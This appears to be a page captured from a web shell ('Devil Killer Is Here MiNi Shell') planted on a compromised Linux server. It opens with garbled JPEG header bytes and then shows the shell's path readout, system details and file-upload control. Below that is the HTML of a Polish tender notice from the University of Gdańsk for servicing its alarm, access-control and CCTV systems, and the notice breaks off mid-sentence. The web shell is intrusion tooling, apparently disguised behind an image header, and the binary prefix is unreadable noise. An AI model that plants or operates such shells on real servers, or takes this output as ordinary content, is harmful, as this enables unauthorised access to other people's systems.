JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220125/0003325301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi serwisu i konserwacji systemów sygnalizacji włamania i napadu (SSWiN), systemów kontroli dostępu (SKD), systemów telewizji dozorowej (CCTV), w obiektach Uniwersytetu Gdańskiego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">UNIWERSYTET GDAŃSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001330</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Bażyńskiego 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-309</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">cpz@ug.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ug.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi serwisu i konserwacji systemów sygnalizacji włamania i napadu (SSWiN), systemów kontroli dostępu (SKD), systemów telewizji dozorowej (CCTV), w obiektach Uniwersytetu Gdańskiego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-651f15ab-7dae-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00033253</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ug <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ug</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w niniejszym postępowaniu, w tym wymiana informacji oraz przekazywanie<br/>dokumentów i oświadczeń między Zamawiającym a Wykonawcami, odbywa się przy użyciu środków<br/>komunikacji elektronicznej za pośrednictwem platformy zakupowej platformazakupowa.pl (dalej<br/>platforma) pod adresem: https://platformazakupowa.pl/pn/ug<br/>Wszystkie szczegółowe informacje znajdują się w SWZ rozdział X</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>Zamawiający informuje, że:<br/>1) Administratorem Pani/Pana danych osobowych jest Uniwersytet Gdański, 80-309 Gdańsk, ul. Jana Bażyńskiego 8, zwany dalej Zamawiającym.<br/>2) Administrator danych osobowych powołał inspektora ochrony danych, z którym można skontaktować się pod numerem telefonu (58) 523 31 30, (58) 523 24 59 lub adresem email: iod@ug.edu.pl.<br/>3) Pani/Pana dane osobowe przetwarzane będą:<br/>- na podstawie art. 6 ust. 1 lit. c) RODO w celu prowadzenia przedmiotowego postępowania o<br/>udzielenie zamówienia publicznego;<br/>- na podstawie art. 6 ust. 1 lit. b) RODO - po wyborze oferty najkorzystniejszej - w celu wykonania<br/>umowy zawartej w wyniku rozstrzygnięcia ww. postępowania, której stroną jest osoba, której dane<br/>dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy.<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Pzp.<br/>5) Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celów<br/>wskazanych w ppkt 3) jak również obowiązku archiwizacyjnego wynikającego z przepisów prawa.<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Pzp wraz z przepisami wykonawczymi.*<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>(w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;**<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;***<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. b i c RODO.<br/>* Wyjaśnienie: dotyczy zbierania danych osobowych od osoby, której dane dotyczą.<br/>**Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>***Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego.<br/>Pełna treść klauzuli znajduje się w rozdziale XXI SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">5750.291.1.6.2022.MB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia publicznego jest świadczenie usługi serwisu i konserwacji<br/>systemów sygnalizacji włamania i napadu (SSWiN), systemów kontroli dostępu (SKD),<br/>systemów telewizji dozorowej (CCTV) w obiektach Uniwersytetu Gdańskiego.<br/>2. Kod Klasyfikacji Wspólnego Słownika Zamówień (CPV): 50700000-2; 50710000-5.<br/>3. Załącznik nr 1A do SWZ – formularz przedmiotowo-cenowy, zawiera wykaz obiektów<br/>Uniwersytetu Gdańskiego, ilość okresów kwartalnych do wykonywania serwisu i konserwacji w<br/>okresie obowiązywania umowy, wraz ze wskazaniem urządzeń, podzespołów, instalacji i części<br/>w systemach sygnalizacji włamania i napadu (SSWiN), systemach kontroli dostępu (SKD) i<br/>systemach telewizji dozorowej (CCTV) w obiektach Zamawiającego.<br/>4. Szczegółowy zakres wykonywania usługi określa specyfikacja czynności serwisowych<br/>i konserwacyjnych systemów SSWiN, SKD, CCTV – załącznik nr 1B do SWZ. Szczegółowe<br/>dane dotyczące w/w systemów zostaną przekazane Wykonawcy, z którym zostanie podpisana<br/>mowa.<br/>5. Zakres usług obejmuje utrzymywanie systemów SSWiN, SKD, CCTV w ciągłej sprawności<br/>technicznej. Wykonawca zobowiązany jest do prowadzenia całodobowego serwisu awaryjnego.<br/>6. Przeglądy konserwacyjne muszą być przeprowadzane w cyklach raz na kwartał, zgodnie<br/>z aktualnym poziomem wiedzy technicznej oraz z należytą starannością.<br/>7. Zamówienie musi być wykonywane przez osoby:<br/>1) wpisane na listę kwalifikowanych pracowników zabezpieczenia technicznego wydanego przez<br/>Komendanta Wojewódzkiego Policji (dawna licencja),<br/>2) posiadające poświadczenie bezpieczeństwa osobowego wydane na podstawie art. 28 pkt. 1<br/>ustawy o ochronie informacji niejawnych (tekst jednolity Dz. U. z 2019 r. poz. 742) albo<br/>upoważnienie do dostępu do informacji niejawnych o klauzuli &#34;zastrzeżone&#34; wydane w trybie art.<br/>21 ust. 4 pkt. 1 w/w ustawy<br/>w/w dokumenty dostarczone zgodnie z zapisem rozdziału XX pkt 6 ppkt 5.<br/>8. Wykonawca w odniesieniu do osób wykonujących czynności serwisowe wymagające<br/>odpowiednich uprawnień musi przed podpisaniem umowy złożyć kopie dokumentów, zgodnie z<br/>rozdziałem XX pkt 6 ppkt 4) i 5).<br/>9. Prace mają być wykonywane zgodnie z:<br/>1) DTR urządzeń,<br/>2) przepisami BHP,<br/>3) przepisami ppoż.,<br/>4) zarządzeniem Rektora UG nr 98/R/12 - załącznik nr 8 do SWZ.<br/>10. W wynagrodzeniu Wykonawcy muszą być ujęte koszty materiałów niezbędnych do<br/>świadczenia usługi, o których mowa w załączniku nr 7 do SWZ.<br/>11. Serwis i konserwację, a także koszty robocizny przy naprawach, w tym koszty dojazdów<br/>związane z serwisem i konserwacją oraz usunięciem awarii należy uwzględnić w cenie oferty.<br/>12. Usunięcie awarii poprzez wymianę całego urządzenia, części urządzenia bądź podzespołu,<br/>które jest na liście do serwisu – załącznik nr 1A do SWZ, jest traktowane również jako usunięcie<br/>awarii, bez dodatkowych kosztów robocizny z uwzględnieniem pkt 13.<br/>13. Wykonawca nie ponosi kosztów związanych z dostawą mediów np. wody, energii<br/>elektrycznej.<br/>14. Zaleca się, aby Wykonawca przed przystąpieniem do przygotowania oferty przeprowadził<br/>wizję lokalną w obiekcie, gdzie zainstalowane są urządzenia i systemy objęte przedmiotem<br/>zamówienia i dokonał własnej oceny zakresu prac, która jest konieczna do przygotowania oferty.<br/>Koszty dokonania wizji lokalnej ponosi Wykonawca. Termin wizji należy uzgodnić z Zamawiającym.<br/>15. Wykonawca na wszelkie dostarczone i zamontowane części, urządzenia zapewni minimum<br/>24 miesięczną gwarancję. Szczegóły dotyczące gwarancji zawarte są w § 9 projektu umowy -<br/>załącznik nr 4 do SWZ.<br/>16. Wymagania dotyczące zatrudnienia przez Wykonawcę lub Podwykonawcę lub dalszego<br/>Podwykonawcę osób na podstawie stosunku pracy, w rozumieniu ustawy z dnia 26 czerwca<br/>1974r. Kodeks pracy (t.j. Dz.U. z 2020 r. poz.1320), zawarte są w § 7 projektu umowy - załącznik<br/>nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50700000-2 - Usługi w zakresie napraw i konserwacji instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zamawiający uzna za najkorzystniejszą ofertę, która uzyska najwyższą ilość punktów obliczoną według wzoru: P = P(C) + R + D<br/>3.	Zamawiający oceniał będzie złożone oferty wyłącznie w oparciu o wskazane powyżej kryteria.<br/>4.	Maksymalna liczba punktów, jaką może osiągnąć oferta po przeliczeniu ilości punktów przyznanych za kryteria wynosi 100 pkt.<br/>5.	Zamawiający zastosuje zaokrąglenie wyników do dwóch miejsc po przecinku.<br/>6.	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawiać będzie taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybierze spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>7.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybierze ofertę z najniższą ceną.<br/>8.	Jeżeli nie będzie można dokonać wyboru oferty w sposób, o którym mowa w pkt 7, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>9.	Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji serwisu na zgłoszoną awarię</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osób skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) Zdolności do występowania w obrocie gospodarczym Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań.<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów.<br/>Na potwierdzenie tego warunku Zamawiający wymaga wykazania się, przez Wykonawcę<br/>posiadaniem aktualnej Koncesji wydanej przez Ministra Spraw Wewnętrznych i Administracji na<br/>prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych<br/>w formie zabezpieczenia technicznego.<br/>3) Sytuacji ekonomicznej lub finansowej<br/>Na potwierdzenie tego warunku Zamawiający wymaga wykazania się, przez Wykonawcę, że jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 250.000,00 PLN.<br/>4) Zdolności technicznej lub zawodowej<br/>a) Na potwierdzenie tego warunku Zamawiający wymaga wykazania się przez Wykonawcę<br/>wykonaniem, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych,<br/>w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co<br/>najmniej jednej usługi polegającej na świadczeniu usługi serwisu i konserwacji systemów bezpieczeństwa w budynkach zrealizowaną na kwotę nie mniejszą niż 250 000,00 PLN brutto.<br/>b) Na potwierdzenie tego warunku Zamawiający wymaga wykazania, że Wykonawca dysponuje<br/>lub będzie dysponował w okresie realizacji zamówienia osobami zdolnymi do wykonania<br/>zamówienia tj.:<br/> co najmniej czterema osobami, każda z aktualnym świadectwem kwalifikacyjnym, wydanym<br/>zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003r., Nr 89, poz. 828 z późn. zm.), uprawniającymi do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku EKSPLOATACJI, Grupy 1 pkt. 2 - napięcie nie wyższe niż 1 kV oraz pkt. 10 - aparatura kontrolno – pomiarowa,<br/> co najmniej jedną osobą z aktualnym świadectwem kwalifikacyjnym, wydanym zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w<br/>sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się<br/>eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003r., Nr 89, poz. 828 z późn. zm.), uprawniającym do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku DOZORU, Grupy 1 pkt. 2 - napięciu nie wyższym niż 1 kV oraz pkt. 10 - aparatura kontrolno – pomiarowa (może być to jedna z czterech lub większej ilości osób wymienionych w tiret pierwsze),<br/> co najmniej dwiema osobami, które będą uczestniczyć w wykonywaniu zamówienia posiadającymi przeszkolenie techniczne potwierdzone na piśmie w zakresie funkcjonowania, konfiguracji i montażu zintegrowanego systemu alarmowego oraz kontroli dostępu (SSWiN/SKD) opartych na systemach C&amp;C Partners, (mogą to być dwie z czterech lub większej ilości osób wymienionych w tiret pierwsze), <br/> co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą<br/>przeszkolenie techniczne potwierdzone na piśmie w zakresie funkcjonowania, konfiguracji i<br/>montażu zintegrowanego systemu alarmowego oraz kontroli dostępu (SSWiN/SKD) opartych na<br/>centralach ATS4518 UTC Fire&amp;Security, (może być to jedna z czterech lub większej ilości osób wymienionych w tiret pierwsze),<br/> co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą<br/>przeszkolenie techniczne potwierdzone na piśmie w zakresie funkcjonowania, konfiguracji i<br/>montażu zintegrowanego systemu alarmowego oraz kontroli dostępu (SSWiN/SKD) GENESIS,<br/>(może być to jedna z czterech lub większej ilości osób wymienionych w tiret pierwsze),<br/> co najmniej dwiema osobami, które będą uczestniczyć w wykonywaniu zamówienia,<br/>posiadającymi przeszkolenie techniczne potwierdzone na piśmie w zakresie obsługi<br/>i konserwacji systemów alarmowych i kontroli dostępu opartych na urządzeniach firmy SATEL,<br/>(mogą to być dwie z czterech lub większej ilości osób wymienionych w tiret pierwsze).<br/>Kwalifikacje, o których mowa w ppkt b (lub dowolną część z nich ) może posiadać ta sama<br/>osoba.<br/>W przypadku gdy Wykonawca, na potwierdzenie warunku, o którym mowa w lit. b) przedstawi mniejszą liczbę osób niż 4, powyższy warunek zostanie uznany za niespełniony. Większa ilość osób skierowana do realizacji zamówienia nie wpływa na spełnienie kryterium określonego w rozdziale XVI pkt 1 ppkt 3).<br/>2. Zasady oceny spełniania warunków Zamawiającego:<br/>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły<br/>spełnia - nie spełnia na podstawie dokumentów opisanych w rozdziale VII pkt 3 SWZ.<br/>3. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia na podstawie<br/>art. 58 ust. 1 Pzp warunek udziału w postępowaniu określony w:<br/>1) pkt 1 ppkt 2) musi dotyczyć tego z Wykonawców, który faktycznie będzie 